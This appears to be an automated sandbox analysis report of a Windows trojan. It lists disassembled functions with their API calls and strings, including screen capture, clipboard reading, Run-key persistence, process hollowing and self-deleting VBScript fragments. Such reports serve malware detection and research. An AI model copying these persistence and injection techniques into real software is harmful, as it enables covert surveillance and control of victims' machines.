Opcode Fuzzy Hash: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B

Function 00445E1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F

Strings

e]j[/, xrefs: 00445E22
GetLocaleInfoEx, xrefs: 00445E37

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx$e]j[/
API String ID: 2299586839-157743352
Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D

Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C

Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040A65D
GetClipboardData.USER32(0000000D), ref: 0040A669
CloseClipboard.USER32 ref: 0040A671

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE

Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3

Strings

, xrefs: 00432B5A

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5

Function 0044F4F3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547

Strings

e]j[/, xrefs: 0044F4FE

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: e]j[/
API String ID: 1663032902-424226671
Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59

Function 00445914 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9

EnumSystemLocalesW.KERNEL32(Function_000458CE,00000001,0046B680,0000000C), ref: 0044594C

Strings

e]j[/, xrefs: 00445954

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID: e]j[/
API String ID: 1272433827-424226671
Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E

Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A

Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F2A3,00000001), ref: 0044F1ED

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
Opcode Fuzzy Hash: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744

Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
Opcode Fuzzy Hash: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4

Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F4F3,00000001), ref: 0044F262

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
Opcode Fuzzy Hash: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614

Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98

Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F087,00000001), ref: 0044F167

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754

Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6

Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction Fuzzy Hash:

Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
CreateCompatibleDC.GDI32(00000000), ref: 00416EA5

Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
DeleteDC.GDI32(00000000), ref: 00416F32
DeleteDC.GDI32(00000000), ref: 00416F35
DeleteObject.GDI32(00000000), ref: 00416F38
SelectObject.GDI32(00000000,00000000), ref: 00416F59
DeleteDC.GDI32(00000000), ref: 00416F6A
DeleteDC.GDI32(00000000), ref: 00416F6D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
GetIconInfo.USER32(?,?), ref: 00416FC5
DeleteObject.GDI32(?), ref: 00416FF4
DeleteObject.GDI32(?), ref: 00417001
DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
DeleteDC.GDI32(?), ref: 0041713C
DeleteDC.GDI32(00000000), ref: 0041713F
DeleteObject.GDI32(00000000), ref: 00417142
GlobalFree.KERNEL32(?), ref: 0041714D
DeleteObject.GDI32(00000000), ref: 00417201
GlobalFree.KERNEL32(?), ref: 00417208
DeleteDC.GDI32(?), ref: 00417218
DeleteDC.GDI32(00000000), ref: 00417223

Strings

DISPLAY, xrefs: 00416E91

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A

Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
GetProcAddress.KERNEL32(00000000), ref: 00416477
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
GetProcAddress.KERNEL32(00000000), ref: 0041648B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
GetProcAddress.KERNEL32(00000000), ref: 0041649F
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
GetProcAddress.KERNEL32(00000000), ref: 004164B3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
GetThreadContext.KERNEL32(?,00000000), ref: 00416583
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
SetThreadContext.KERNEL32(?,00000000), ref: 00416766
ResumeThread.KERNEL32(?), ref: 00416773
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
GetCurrentProcess.KERNEL32(?), ref: 00416795
TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
GetLastError.KERNEL32 ref: 004167B8

Strings

ZwUnmapViewOfSection, xrefs: 0041648D
ZwClose, xrefs: 004164A1
ZwMapViewOfSection, xrefs: 00416479
ZwCreateSection, xrefs: 0041645A
ntdll, xrefs: 0041645F, 0041647E, 00416492, 004164A6

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
ExitProcess.KERNEL32 ref: 0040C389

Strings

"), xrefs: 0040C18E
while fso.FileExists(", xrefs: 0040C1A5
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C163
H"G, xrefs: 0040C088
wend, xrefs: 0040C242
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C07B
""", 0, xrefs: 0040C2A0
On Error Resume Next, xrefs: 0040C172
fso.DeleteFile ", xrefs: 0040C1F3
fso.DeleteFolder ", xrefs: 0040C264
open, xrefs: 0040C377
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C32C
\update.vbs, xrefs: 0040C134
Temp, xrefs: 0040C139
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C02A
exepath, xrefs: 0040C0B0
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C2BA
t<F, xrefs: 0040C2F0, 0040C331

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
API String ID: 1861856835-1953526029
Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E

Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
ExitProcess.KERNEL32(00000000), ref: 00410F05
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
CloseHandle.KERNEL32(00000000), ref: 00410FA0
GetCurrentProcessId.KERNEL32 ref: 00410FA6
PathFileExistsW.SHLWAPI(?), ref: 00410FD7
GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
lstrcatW.KERNEL32(?,.exe), ref: 00411066

Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
Sleep.KERNEL32(000001F4), ref: 004110E7
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
CloseHandle.KERNEL32(00000000), ref: 0041110E
GetCurrentProcessId.KERNEL32 ref: 00411114

Strings

temp_, xrefs: 00411048
H"G, xrefs: 00410F0B
WDH, xrefs: 00410FAD, 0041111B
open, xrefs: 004110A0
.exe, xrefs: 0041105A
exepath, xrefs: 00410F31
(#G, xrefs: 00410EE8

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
API String ID: 2649220323-71629269
Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D

Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040B882
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
_wcslen.LIBCMT ref: 0040B968
CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
_wcslen.LIBCMT ref: 0040BA25
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
ExitProcess.KERNEL32 ref: 0040BC36

Strings

\install.vbs, xrefs: 0040BA3E
WScript.Sleep 1000, xrefs: 0040BA6D
6, xrefs: 0040B95C
open, xrefs: 0040BC24
!G, xrefs: 0040B8C6
fso.DeleteFile , xrefs: 0040BAB6
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BBD2
